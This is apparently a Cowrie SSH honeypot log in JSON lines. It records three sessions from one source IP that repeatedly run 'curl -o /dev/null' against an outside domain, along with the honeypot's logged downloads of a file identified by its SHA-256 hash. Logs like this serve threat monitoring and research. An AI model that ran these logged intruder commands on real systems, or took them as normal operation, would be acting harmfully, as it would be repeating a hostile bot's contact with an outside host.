{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.375559Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.378380Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.378995Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.382389Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.411190Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.413030Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.415907Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.418530Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.419290Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.424531Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.425906Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.426621Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.428213Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.429026Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.434790Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.461965Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.463697Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.466040Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.469469Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.470080Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.471563Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.472402Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.473768Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.474313Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.523813Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.526766Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.528457Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.531360Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.531956Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.533608Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.534049Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.537572Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.539139Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.539840Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.568334Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.568955Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.571706Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.574522Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.576494Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.577034Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.580848Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.582544Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.583002Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.607125Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.607814Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.611837Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.613571Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.615151Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.615617Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.618039Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.620212Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.621374Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.644975Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.645614Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.649321Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.653040Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.654065Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.654524Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.656573Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.657202Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.685945Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.686597Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.689954Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.692840Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.693377Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.697599Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.698570Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.699090Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.702495Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.706509Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.729306Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.731473Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.733576Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.734909Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.735556Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.737385Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.738019Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.741372Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
